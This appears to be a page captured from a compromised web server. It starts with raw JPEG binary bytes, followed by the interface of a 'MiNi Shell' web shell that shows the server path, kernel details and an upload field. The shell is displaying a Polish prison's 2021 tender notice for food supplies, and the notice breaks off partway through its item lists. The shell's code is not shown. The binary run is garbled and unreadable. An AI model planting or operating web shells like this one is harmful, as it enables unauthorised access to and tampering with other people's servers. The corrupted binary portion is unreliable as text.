JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210625/0009488401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00094884 z dnia 2021-06-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy różnych artykułów spożywczych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny Nr 1 w Grudziądzu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000319641</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wybickiego 10/22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grudziądz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 56 6440400</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 56 6440499</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_1_grudziadz@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> zakład karny </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy różnych artykułów spożywczych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3aef40ee-d4d6-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00094884</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00022190/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Dostawy różnych artykułów spożywczych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/; https://epuap.gov.pl/wps/portal; zk_1_grudziadz@sw.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanych Formularzy lub za pomocą poczty elektronicznej. Korespondencja przesłana za pomocą Formularzy nie może być szyfrowana.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”; Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP); Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB; We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i wykonawcy posługują się ID postępowania. Postępowanie prowadzone jest w języku polskim. Maksymalny rozmiar plików przesyłanych za pośrednictwem poczty elektronicznej wynosi 35 MB. Za datę przekazania dokumentów elektronicznych przyjmuje się datę ich przekazania na ePUAP. Potwierdzeniem przekazania jest Urzędowe Potwierdzenie wygenerowane przez ePUAP. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1. Administratorem danych osobowych jest Zakład Karny Nr 1, ul. Wybickiego 10/22, 86-300 Grudziądz, tel. 56 64 40 400.<br/>2. Inspektorem ochrony danych osobowych w Zakładzie Karnym Nr 1 w Grudziądzu jest Pan Radosław Kulwicki, iod_zk_1_grudziadz, tel. 56 451 54 09. <br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na dostawy różnych artykułów spożywczych prowadzonym w trybie podstawowym bez negocjacji.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych <br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. Posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D.Kw.2232.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 470570,90 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">12</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Artykuły zbożowe<br/>Lp.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	2	3	4<br/>1	Bułka tarta	kg	1 900<br/>2	Chrupki kukurydziane	kg	290<br/>3	Kasza jęczmienna	kg	10 000<br/>4	Kasza manna	kg	3 500<br/>5	Makaron (typu świderki)	kg	18 000<br/>6	Mąka pszenna typu 500	kg	15 000<br/>7	Mąka ziemniaczana	kg	50<br/>8	Płatki kukurydziane	kg	50<br/>9	Płatki owsiane (błyskawiczne)	kg	150<br/>10	Ryż biały	kg	10 000<br/>11	Wafle ryżowe bezglutenowe	kg	250 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 98897,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15612100-2 - Mąka pszenna</p> <p class="mb-0">15613000-8 - Produkty z ziaren zbóż</p> <p class="mb-0">15613311-1 - Płatki kukurydziane</p> <p class="mb-0">15613380-5 - Płatki owsiane</p> <p class="mb-0">15614000-5 - Ryż przetworzony</p> <p class="mb-0">15614100-6 - Ryż długoziarnisty</p> <p class="mb-0">15623000-1 - Skrobie</p> <p class="mb-0">15811100-7 - Chleb</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Buliony<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	Barszcz biały w proszku	kg	550<br/>2	Rosół drobiowy w proszku	kg	3 200<br/>3	Rosół jarzynowy w proszku	kg	4 400<br/>4	Zupa pieczarkowa sypka	kg	250<br/>5	Żurek w proszku	kg	480 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 16069,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15891000-0 - Zupy i buliony</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15891400-4 - Zupy</p> <p class="mb-0">15891500-5 - Buliony</p> <p class="mb-0">15892000-7 - Wywary warzywne, ekstrakty, substancje peptydowe i zagęszczacze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cukier<br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	Cukier biały kryształ	kg	4 600 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 10258,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15831200-4 - Cukier biały</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów, przy czym oferta na każdą część podlega odrębnej ocenie:<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma maksymalną ilość 60 punktów, pozostali wykonawcy otrzymają proporcjonalnie mniej punktów, stosownie do wzoru:<br/><br/> najniższa cena brutto spośród oferowanych (Cn)<br/> Uzyskana liczba punktów (Xc) = ------------------------------------------------------- x 60<br/> cena brutto z oferty badanej (Cb)<br/><br/>Zamawiający będzie przyznawał punkty za ww. kryterium z dokładnością do dwóch miejsc po przecinku.<br/><br/>b) Termin płatności max. (Xt) 40% – nie może być krótszy niż 21 dni<br/>Za powyższe kryterium można otrzymać następującą ilość punktów:<br/>- termin płatności 30 dni – 40 pkt<br/>- termin płatności 21 dni - 20 pkt<br/>W przypadku nie zaznaczenia w formularzu ofertowego proponowanego terminu płatności Zamawiający automatycznie przyjmuje termin płatności 21 dni oraz 20 pkt w tym kryterium.<br/><br/>c) Sposób obliczenia wartości punktowej całej oferty<br/>Wartość punktowa całej oferty (Wo) = wartość punktowa ocenianej oferty za cenę (Xc) + wartość punktowa ocenianej oferty za termin płatności (Xt)<br/>Wartość punktowa całej oferty będzie przyznana z dokładnością do dwóch miejsc po przecinku. Oferty oceniane będą punktowo. Maksymalna ilość punktów, jaką po uwzględnieniu wagi kryteriów może osiągnąć oferta wynosi 100 pkt. Zamawiający udzieli zamówienia Wykonawcy, którego oferta którego oferta zostanie uznana za najkorzystniejszą t.j. uzyska największą ilość punktów. <br/>Zamawiający powiadomi o wynikach postępowania wszystkich wykonawców, którzy złożyli oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Różne artykuły spożywcze i przyprawy <br/>L.p.	Nazwa artykułu	j.m.	Szacunkowa ilość<br/>1	2	3	